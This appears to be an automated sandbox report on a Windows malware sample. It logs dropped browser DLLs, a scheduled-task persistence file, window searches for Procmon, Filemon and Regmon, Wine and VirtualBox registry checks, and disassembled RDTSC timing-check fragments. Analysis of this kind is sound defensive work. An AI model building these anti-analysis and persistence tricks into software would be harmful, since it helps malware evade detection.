                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA155F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_6CA155F0
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A1E52 second address: 9A1E72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73D4C57606h 0x00000008 jmp 00007F73D4C57616h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A1E72 second address: 9A1E7C instructions: 0x00000000 rdtsc 0x00000002 js 00007F73D4D0E04Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A0F0C second address: 9A0F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A1333 second address: 9A133E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A133E second address: 9A1355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F73D4C5760Dh 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A340A second address: 9A3418 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A3418 second address: 9A341C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A341C second address: 9A3434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E04Dh 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A3434 second address: 9A3446 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73D4C57606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F73D4C57606h 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A34AA second address: 9A34C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F73D4D0E04Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9A34C0 second address: 9A358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F73D4C5760Eh 0x0000000d push 00000000h 0x0000000f or dword ptr [ebp+122D1C00h], esi 0x00000015 push 7B2CE066h 0x0000001a jmp 00007F73D4C57619h 0x0000001f xor dword ptr [esp], 7B2CE0E6h 0x00000026 mov dword ptr [ebp+122D1987h], esi 0x0000002c push 00000003h 0x0000002e sub dword ptr [ebp+122D2148h], edx 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D24ABh], edi 0x0000003c push 00000003h 0x0000003e mov edi, dword ptr [ebp+122D2AC0h] 0x00000044 push B010676Fh 0x00000049 push ebx 0x0000004a jl 00007F73D4C57611h 0x00000050 jmp 00007F73D4C5760Bh 0x00000055 pop ebx 0x00000056 xor dword ptr [esp], 7010676Fh 0x0000005d cld 0x0000005e lea ebx, dword ptr [ebp+12448000h] 0x00000064 push 00000000h 0x00000066 push ecx 0x00000067 call 00007F73D4C57608h 0x0000006c pop ecx 0x0000006d mov dword ptr [esp+04h], ecx 0x00000071 add dword ptr [esp+04h], 00000014h 0x00000079 inc ecx 0x0000007a push ecx 0x0000007b ret 0x0000007c pop ecx 0x0000007d ret 0x0000007e call 00007F73D4C57616h 0x00000083 mov edi, dword ptr [ebp+122D2BA8h] 0x00000089 pop esi 0x0000008a push eax 0x0000008b jl 00007F73D4C57610h 0x00000091 push eax 0x00000092 push edx 0x00000093 push esi 0x00000094 pop esi 0x00000095 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 99335C second address: 993360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 993360 second address: 99337A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C5760Ah 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C3ECE second address: 9C3ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C3ED2 second address: 9C3ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C41C9 second address: 9C41E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F73D4D0E052h 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C41E1 second address: 9C41E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C4BE5 second address: 9C4C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F73D4D0E059h 0x0000000b jmp 00007F73D4D0E04Fh 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C4C13 second address: 9C4C1F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73D4C57606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C501C second address: 9C5040 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73D4D0E046h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F73D4D0E055h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 993335 second address: 99333B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 99333B second address: 99333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 99333F second address: 99335C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73D4C57606h 0x00000008 jmp 00007F73D4C5760Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9982E9 second address: 9982ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9982ED second address: 998318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57613h 0x00000007 jmp 00007F73D4C57614h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C51BA second address: 9C51D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C51D6 second address: 9C51DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C51DE second address: 9C51E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C59D4 second address: 9C59FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73D4C5760Eh 0x0000000d jbe 00007F73D4C5760Ah 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C59FB second address: 9C5A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Eh 0x00000007 jmp 00007F73D4D0E051h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C5A1E second address: 9C5A28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73D4C5760Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C5BAD second address: 9C5BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E04Ch 0x00000009 jnl 00007F73D4D0E046h 0x0000000f js 00007F73D4D0E046h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F73D4D0E055h 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C5BE1 second address: 9C5BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C5D30 second address: 9C5D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9C93FE second address: 9C9414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4C57612h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9CA96B second address: 9CA970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9CBE98 second address: 9CBEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1A24 second address: 9D1A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1A2F second address: 9D1A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1A33 second address: 9D1A3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1A3D second address: 9D1A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1CD6 second address: 9D1CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F73D4D0E046h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F73D4D0E04Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F73D4D0E046h 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1CF8 second address: 9D1CFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1CFE second address: 9D1D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F73D4D0E046h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1D0A second address: 9D1D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F73D4C57606h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D1D1C second address: 9D1D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D2193 second address: 9D21C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73D4C57614h 0x0000000d jmp 00007F73D4C57610h 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D2467 second address: 9D2486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F73D4D0E04Bh 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D3678 second address: 9D3683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D3A0C second address: 9D3A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D3A12 second address: 9D3A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D3C5B second address: 9D3C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D3C5F second address: 9D3C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D493E second address: 9D494C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F73D4D0E04Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D66CF second address: 9D6723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F73D4C57606h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jne 00007F73D4C5761Ah 0x00000014 push edi 0x00000015 jg 00007F73D4C57606h 0x0000001b pop edi 0x0000001c popad 0x0000001d nop 0x0000001e cld 0x0000001f push 00000000h 0x00000021 mov esi, ebx 0x00000023 push 00000000h 0x00000025 jnp 00007F73D4C5760Ch 0x0000002b push eax 0x0000002c je 00007F73D4C57614h 0x00000032 push eax 0x00000033 push edx 0x00000034 jno 00007F73D4C57606h 0x0000003a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D8138 second address: 9D813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 9D8C87 second address: 9D8C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
